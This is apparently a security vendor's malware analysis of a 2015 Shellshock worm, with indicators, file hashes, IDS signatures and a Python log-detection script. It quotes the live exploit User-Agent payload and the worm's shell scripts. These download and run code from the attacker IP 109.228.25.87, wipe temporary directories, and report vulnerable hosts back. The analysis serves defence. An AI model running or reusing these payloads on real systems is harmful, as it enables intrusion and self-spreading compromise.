A New Shellshock Worm on the Loose

In a blog post from September last year, we described some of the early Shellshock activity we were seeing in the wild. Since then we have continued to observe periodic scanning, which has by and large not been particularly noteworthy. That remained the case until very recently. Starting late in the afternoon on April 8, 2015, the frequency and breadth of scanning observed by Volexity increased fairly dramatically. A closer look at the activity reveals that a worm (of sorts) has been set loose on the Internet looking for vulnerable hosts to exploit over HTTP.

The inbound requests that have been observed look like this:

GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: <ip address>
Connection: Close

The first request contains a double HTTP/1.1 header. The Shellshock exploit attempt then comes via the User-Agent string. The attacking systems attempt the exploit against the following file paths on the targeted system (in this order):

/cgi-bin/php
/
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5

If successful, the exploit attempts to perform the following actions:

  • Print "XSUCCESS!" back to the source system.
  • Change to a temporary directory on the system (/tmp or /var/tmp).
  • Remove any existing files named .c.txt and .d.txt.
  • Download the file .c.txt from 109.228.25.87 using wget, curl, fetch, and lwp-download.
  • Change the access permissions of .c.txt (or any file in the directory whose name starts with .c.txt) to make it executable.
  • Execute .c.txt (or any file in the directory whose name starts with .c.txt).

Now, a further look at the file .c.txt shows it has the following contents:

rm -rf /tmp/* /tmp/.* &
rm -rf /var/tmp/* /var/tmp/.* &
cd /var/tmp/
cd /tmp
killall -9 scan brute f b r print pscan pnscan ps minerd &
sleep 10
wget http://109.228.25.87/.ips-80/cc.tar
curl -O http://109.228.25.87/.ips-80/cc.tar
sleep 5
tar xvf cc.tar
tar zxvf cc.tar
tar xvf  cc.tar.1
tar zxvf cc.tar.1
tar xzvf cc.tar
tar xzvf cc.tar.1
sleep 10
cd .cc
chmod +x *
nohup ./r &

After performing a few tasks, the script will download a tarball file from http://109.228.25.87/.ips-80/cc.tar.

Filename: cc.tar
File size: 51200 bytes
MD5 hash: 4d56cf72a5e9a64cffce2489f0c83a47
SHA1 hash: 826c881d0787f11f4acb7d3b27905c47d8e8d5b3
Notes: Tarball containing scripts and 32-bit and 64-bit scanning binaries.

Within this tarball file are the following files:

Filename: cgiscan32
File size: 12685 bytes
MD5 hash: b3f9345a6e2de5348645e8060ad1c8a9
SHA1 hash: d669bca815f44d54d81ba523ccfd187529394ee7
Notes: 32-bit ELF scanning binary (compiled sslvuln.c)

Filename: cgiscan64
File size: 15083 bytes
MD5 hash: 20fa3835528a5f28907dea9123117b02
SHA1 hash: a8ec2eb582c7011aee5c90ec0dcf5b48e7d14b5e
Notes: 64-bit ELF scanning binary (compiled sslvuln.c)

Filename: patch
File size: 556 bytes
MD5 hash: 23ea9aed18bdef6ef5efee3b5fbdde0c
SHA1 hash: 8062ef8840b5664e0c58e83224a68ba283b38aac
Notes: Text file with file paths to be scanned for Shellshock vulnerability.

Filename: paths
File size: 556 bytes
MD5 hash: 23ea9aed18bdef6ef5efee3b5fbdde0c
SHA1 hash: 8062ef8840b5664e0c58e83224a68ba283b38aac
Notes: Text file with file paths to be scanned for Shellshock vulnerability. Same file as "patch".

Filename: print
File size: 490 bytes
MD5 hash: eba7062843a4161907758112f78642c6
SHA1 hash: dd411e6307f8142a8b67173748e4a46c8a2af654
Notes: Script used for reporting back IP addresses found to be vulnerable with Shellshock.

Filename: r
File size: 5463 bytes
MD5 hash: a15666421a3d34064bbb18a3449f1406
SHA1 hash: 586de34a05c09f235c61da9f0d54ec53d7c277ac
Notes: Script used to feed the "start" script file paths to be downloaded that contain blocks of IP addresses to be scanned.

Filename: start
File size: 437 bytes
MD5 hash: 62d07f41433c67e1120cd9e9a00135c5
SHA1 hash: f10e0a29e5f9e6cf21fbce04fe96eacb780e8b29
Notes: Script that initiates all IP range downloads, scanning, saving of vulnerable hosts, and then launches "print" to report back.

Attack Initiation

As can be seen from the file .c.txt, the last thing it does is launch the file r. The file r is a bash script which feeds another bash script, start, three letters as a parameter. The full contents of the file start are shown below:

#!/bin/bash
############### Config ###############
rm -rf scan.log
rm -rf vuln-ip.txt

wget http://109.228.25.87/.ips-80/$1
curl -O http://109.228.25.87/.ips-80//$1
fetch http://109.228.25.87/.ips-80/$1

cat $1* |sort -u >> scan.log
rm -rf $1*
sleep 1

if [ `getconf LONG_BIT` = "64" ]
then
./cgiscan64 scan.log v 50 patch
else
./cgiscan32 scan.log v 50 patch
fi

sleep 60
rm -rf t.log
cat vuln-ip.txt | sort -u >t.log
sleep 4
./print

As you can see, the first thing the script does is try to remove any existing copies of scan.log and vuln-ip.txt. After that, it tries to download the file whose name was fed to it by the r script. It then appends the contents of the download to the file scan.log and removes the downloaded file. An example download of one such file would be from the URL http://109.228.25.87/.ips-80/xxx. That "xxx" is not a placeholder; it is an actual file on the server. The file "xxx" contains 26,356 IP addresses and starts with the IP 98.1.153.231 and ends with 98.120.200.16. Each of the various file chunks contains tens of thousands of IP addresses to be used for scanning.

The script then launches either the 32-bit or 64-bit version of an ELF scanning binary. Based on the contents of the file, it appears to be a modified version of a file called mass.c (referenced as sslvuln.c) that was found on a Romanian website. Notable strings in the binaries include:

GET %s%s HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: %s
Connection: Close

Nu Pot Deschide %s

vuln-tot.txt

vuln-ip.txt

As you can see, the binaries have the Shellshock download site we have observed embedded into the Linux binaries. As a result, all systems that are successfully exploited then repeat the process that was just observed and effectively become part of the scanning/worm network. The cgiscan binaries log all vulnerable hosts they find to a file named vuln-ip.txt. Finally, at the end of the start script, once the current scanning activity has completed, it sorts the discovered vulnerable hosts, removes any duplicate entries, stores them in a file named t.log, and launches another bash script named print. The full contents of the print bash script are shown below:

#!/bin/bash

if which wget >/dev/null; then

for i in `cat t.log|sort|uniq`
do
wget -O .tmp http://109.228.25.87/.c.php?request="$i" &>/dev/null&
done
else

if which curl >/dev/null; then

for i in `cat t.log|sort|uniq`
do
curl -O http://109.228.25.87/.c.php?request="$i" &>/dev/null&
rm -rf $i
done
else

if which fetch >/dev/null; then

for i in `cat t.log|sort|uniq`
do
curl -O http://109.228.25.87/.c.php?request="$i" &>/dev/null&
rm -rf $i
done

fi

fi

fi

sleep 1

The script enumerates the list of vulnerable hosts recorded in the file t.log and reports them back to the attacker's server at 109.228.25.87 via the file .c.php, placing each IP address as the value of the request= URI parameter. This allows the attackers to maintain a list of vulnerable systems that they have managed to compromise.

Network Indicators

The most solid network indicator at this time is looking for any sort of outbound communication with the IP address 109.228.25.87. Utilizing the Shadowserver ASN lookup service, we see this system resides on an IP address at Fast Hosts Ltd.

$ whois -h asn.shadowserver.org 'origin 109.228.25.87'
8560 | 109.228.0.0/18 | ONEANDONE | DE | fasthosts.com | Fast Hosts Ltd

Additionally, signatures can be leveraged with an IDS to look for the requests as well. Simple signatures that can be leveraged are shown below:

Suricata Format

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Volex - Possible Shellshock Worm Check-in Detected"; flow:established,to_server; content:".c.php?request="; http_uri;  sid:2015040901;)

Snort Format

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Volex - Possible Shellshock Worm Check-in Detected"; flow:established,to_server; content:".c.php?request="; http_uri;  sid:2015040901;)

These signatures can be made more broad to just look for ".php?request=" and alternatively can be made more restrictive by adding a pcre check for an IP address as part of the URI (/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/).
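The same detection logic as the signatures above, applied to the inbound request shown earlier and to outbound check-ins, as an added example that is not part of the original post. It parses constructed combined-format web server and proxy log lines (a hypothetical, labelled sample) and applies both the ".c.php?request=" match and the tighter IPv4 pcre check described above, plus a check for the "() { :;};" function-definition prefix in the User-Agent.

```python
import re

# Apache combined log format; User-Agent is captured greedily so embedded quotes survive.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# Bash function-definition prefix that marks a Shellshock attempt in a header value.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\};")
# Worm check-in URI, tightened with the IPv4 pattern the post suggests as a pcre check.
CHECKIN_RE = re.compile(
    r"\.c\.php\?request=(?P<victim>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
)
WORM_HOST = "109.228.25.87"  # download and check-in host named in the post


def classify(line):
    """Return (label, source ip, detail) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not combined log format; ignore
    f = m.groupdict()
    if SHELLSHOCK_RE.search(f["ua"]):  # inbound exploit attempt against any path
        return ("shellshock-attempt", f["src"], f["uri"])
    c = CHECKIN_RE.search(f["uri"])  # outbound report of a vulnerable host
    if c:
        return ("worm-checkin", f["src"], c["victim"])
    if WORM_HOST in f["uri"]:  # any other contact with the worm's host
        return ("worm-host-contact", f["src"], f["uri"])
    return None


def scan(lines):
    """Run classify() over log lines and return only the hits, in order."""
    return [hit for hit in (classify(line) for line in lines) if hit]


# Constructed sample lines (RFC 5737 addresses for sources; payload text redacted).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Apr/2015:16:02:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 9 "-" "() { :;};/usr/bin/perl -e \'PAYLOAD_REDACTED\'"',
    '192.0.2.44 - - [08/Apr/2015:16:03:40 +0000] "GET /index.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '10.0.0.12 - - [08/Apr/2015:17:10:00 +0000] "GET http://109.228.25.87/.c.txt '
    'HTTP/1.1" 200 620 "-" "curl/7.35.0"',
    '10.0.0.12 - - [08/Apr/2015:17:15:02 +0000] "GET http://109.228.25.87/.c.php'
    '?request=198.51.100.7 HTTP/1.1" 200 0 "-" "Wget/1.15"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The proxy lines (absolute URIs from an internal source) are the ones that indicate an already-compromised host; the inbound line only shows an attempt and needs the server's response checked separately.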

A Long Story Short

To make a long story short, you should know there is a Shellshock worm, of sorts, going around again. Compromised systems are being added to the network of systems that are scanning for more vulnerable systems. This process is continuing to repeat. The "worm" requires that 109.228.25.87 be online for the files to be downloaded. However, even if this system goes offline, the attackers have still likely compiled a list of vulnerable systems through download logs and the check-in URL where scanning systems further report other vulnerable hosts they have discovered. It is recommended that you actively monitor for connections to 109.228.25.87. If you see traffic going there, you will likely need to deal with a multitude of malware on a system that has likely been compromised several times as a result of the Shellshock vulnerability.

Update 2015-04-09 12:14 UTC

The malicious files housed at 109.228.25.87 appear to have been taken down and scanning activity appears to have slowed down fairly dramatically.